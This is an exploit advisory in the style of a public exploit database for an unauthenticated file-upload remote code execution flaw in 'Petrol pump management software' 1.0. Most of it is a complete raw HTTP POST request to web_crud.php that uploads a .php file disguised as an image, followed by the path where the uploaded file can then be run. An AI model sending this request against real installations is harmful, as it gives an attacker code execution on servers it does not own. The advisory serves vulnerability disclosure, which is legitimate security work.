# Exploit Title: Petrol pump management software - File Upload Remote Code Execution (RCE) (unauthenticated) # Google Dork: N/A # Application: Petrol pump management software # Date: 20.02.2024 # Bugs: File Upload Remote Code Execution (RCE) (unauthenticated) # Exploit Author: SoSPiro # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html # Version: 1.0 # Tested on: Windows 10 64 bit Wampserver # CVE : N/A ## Vulnerability Description: Due to a security vulnerability in "fuelflow/admin/app/web_crud.php," unauthorized users can upload files using the "POST" method. The uploaded files are stored in the "/fuelflow/assets/images" folder. This allows malicious individuals to execute unauthorized commands on the system. ## Staus: HIGH-CRITICAL Vulnerability ## Proof of Concept (PoC): Video: https://drive.google.com/file/d/1_jue-UhpASC_XxcUWU-QhMYDrSIehnWx/view // File upload Request POST /zerday/fuelflow/admin/app/web_crud.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------82750242321210078514140255085 Origin: http://localhost Connection: close Referer: http://localhost/zer/fuelflow/admin/web.php Cookie: PHPSESSID=1 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 -----------------------------82750242321210078514140255085 Content-Disposition: form-data; name="id" 1 -----------------------------82750242321210078514140255085 Content-Disposition: form-data; name="old_photo1_img" test.png -----------------------------82750242321210078514140255085 Content-Disposition: form-data; name="photo1"; filename="3.php" Content-Type: image/png -----------------------------82750242321210078514140255085 Content-Disposition: form-data; name="title" FuelFlow lite - Developed by Mayuri K. tessss -----------------------------82750242321210078514140255085 Content-Disposition: form-data; name="old_photos_img" test.png -----------------------------82750242321210078514140255085 Content-Disposition: form-data; name="photos"; filename="" Content-Type: application/octet-stream -----------------------------82750242321210078514140255085 Content-Disposition: form-data; name="sitekey" test -----------------------------82750242321210078514140255085 Content-Disposition: form-data; name="secretkey" test -----------------------------82750242321210078514140255085 Content-Disposition: form-data; name="update" -----------------------------82750242321210078514140255085-- // Phpinfo file locaton /zerday/fuelflow/assets/images/65d45a6080eca.php